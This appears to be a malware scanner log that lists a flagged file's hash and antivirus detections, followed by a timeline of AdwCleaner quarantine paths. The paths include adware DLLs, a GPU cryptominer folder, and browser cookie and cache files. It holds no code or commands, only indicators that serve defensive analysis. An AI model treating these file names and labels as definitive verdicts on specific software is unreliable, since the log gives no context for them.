      Entropy  . . . . . : 6.2
      SHA-256  . . . . . : D6ECC08A8B80FA99A642234D66E69FB3A8266640CE0809AF5F14339AA79B9459
      Version  . . . . . : 1.0.0.27567
    > Bitdefender  . . . : Trojan.Generic.18009158
    > Kaspersky  . . . . : not-a-virus:AdWare.Win64.Agent.lkv
      Fuzzy  . . . . . . : 105.0
      Forensic Cluster
         -2.4s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D19933300.log
         -2.4s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D18F34700.log
         -2.0s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\
         -2.0s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\LICENSE.txt
         -2.0s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\openweb.bat
         -2.0s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\SnareWindowsInstallSupport.dll
         -2.0s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\stopweb.bat
         -2.0s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\s_32.ico
         -2.0s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\WinSnare.dll
         -1.9s C:\AdwCleaner\quarantine\files\mvmfgnrbrmdbsjisivmhfrvdpvtlbouw\
         -1.9s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\
         -1.9s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\BITB16.tmp
         -1.8s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\
         -1.8s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\Report.wer
         -1.8s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\
         -1.8s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\BITB27.tmp
         -1.7s C:\AdwCleaner\quarantine\files\lvghxrkdvjdmjauuvlqiouualgvwchnk\
         -1.7s C:\AdwCleaner\quarantine\files\atsifbjehqqalokjotexydyeaawktlln\
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies-journal
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data-journal
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\
         -1.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\001180cbc33c583f_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\02cdb733b079655d_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\08bc571418449ead_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\092f95ee9c1fc61c_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ad89b7fc5facf78_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0e02ff08b4002e57_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed73590870cfbd2_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed7399215f555d7_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ef5b10d79d9f0cb_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0fc3db66b9cbe75d_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1b72c2d37a2af109_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1dff67c9badf383d_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1e20774a42d716f3_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1f2ec90a78c46fdf_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2009bcf78a35d470_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\20ba89671f087fc1_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\234986793e71f265_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\26968e7a0c71776d_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2819c5233c1f77b4_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2ac381ccd53e2ce0_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2b11e2e523e5d524_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3082972055161e5d_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3a977894dc0fcd39_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\442182c02ee0a243_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5125b9f58b582f46_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\593d0e1547012291_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5ede7465ad814101_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66928cc3398bdbc9_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66e510668b4796e9_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\6e2284174f43f7b0_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\711f9f610e35a8b6_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7150bac3e922a373_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7589f80f2ddeab29_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\775e37b82f99c13c_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7acdc9382bf6b139_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7d8cebaadfd53fbf_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7ecc93dfade6cf4e_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8326a92c0f293bc4_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\83a226c1379f7a18_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\86850034110cf1c4_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8d9b27c428a8f6a3_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8f60e69a4afd6f60_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\95ff98c7e9c1b8a3_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a1f309cd5a3eb6fa_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2719229322771c8_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2e6c4ddc62e67a7_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b07d05bc07d9c08b_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3986aa6d1a5b1ca_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3edef432256edd5_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b48454e7eeb33014_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ba7c73f14dafe451_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bd48447363dfb226_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\be189d201694bf89_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bfbe9938bbb38577_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c0676a458818319d_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c3329b5e71fb9773_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c487316b1c7eb401_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c8bff37e9d993e8c_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c94b3024dfacfceb_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c9efb04ec241100a_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd31a5585d55d245_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd87b6402756547b_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cda276472aafd1d9_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cdd7d0e76bb75c18_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ce8699f098de9a28_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d19a15ac54bfa3ba_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d652598e0bff0a74_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d85bf4971be98d9f_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dc7c883ebdb4ce43_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dd1fa8967c9eedf1_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\e1548e7879784820_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f4beaede20fc0699_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f552ab47376f113e_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f74a8c1655500d73_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fbef9ceaf336383d_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fddd11ea475c5135_0
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\the-real-index
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage-journal
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage
         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage-journal
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\backup6.bin
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\German_pcp.dat
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-12-2017.log
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-13-2017.log
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\voice.wav
         -1.2s C:\ProgramData\NVIDIA\MessageBus_5528_0x667E90.log
         -1.1s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\em.exe
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\eng_em.ini
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\French_em.ini
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\German_em.ini
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound0.ini
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound2.ini
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\isxdl.dll
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\japan_em.ini
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-12-2017.log
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-13-2017.log
         -0.9s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra-uninst.exe
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\decredGeForce GTX 750 Tigw256l4tc4032.bin
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.conf
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.exe
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\msvcr120.dll
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\start.cmd
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\aes_helper.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake256.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw256.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\cubehash.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\darkcoin-mod.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\decred.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\echo.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\fugue.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl256.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\jh.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak1600.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\luffa.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2re.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2rev2.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2v2.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\neoscrypt.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shabal.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shavite.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\simd.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein256.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\vanilla.cl
         -0.7s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\
         -0.7s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\WinSAP.dll
         -0.6s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\
         -0.6s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\WinSnare.dll
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\sma.exe
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci32.dll
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci64.dll
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi32.exe
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi64.exe
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smu.exe
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\SMUninstall.exe
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smw.sys
         -0.5s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\
         -0.5s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\smhe.js
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\Config.json
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe.config
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.dll
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.Linq.dll
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.xml
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\SQLite.Interop.dll
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\SQLite.Interop.dll
         -0.3s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\
         -0.3s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.HP
         -0.3s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.NT
         -0.3s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\snp.sc
         -0.2s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\
         -0.2s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Config.xml
         -0.2s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe
         -0.2s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe.config
         -0.2s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe.config
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\conf.config
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Config.xml
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\DanDubdom.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Dong-Home.dll
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe.config
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Freshing.dat
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Groovestrong.dat
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.d.dat
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.dat
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.exe
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe.config
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Jaystock.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\md.xml
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Ranzumstring.exe.config
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Singlestock.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\String-Tax.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\TrioDex.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Triszap.dll
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\uninstall.dat
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\White-Fan.dat
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\WhiteDox.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ZamIng.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ondemand\
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Bluedax.bin
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe.config
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\conf.config
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Config.xml
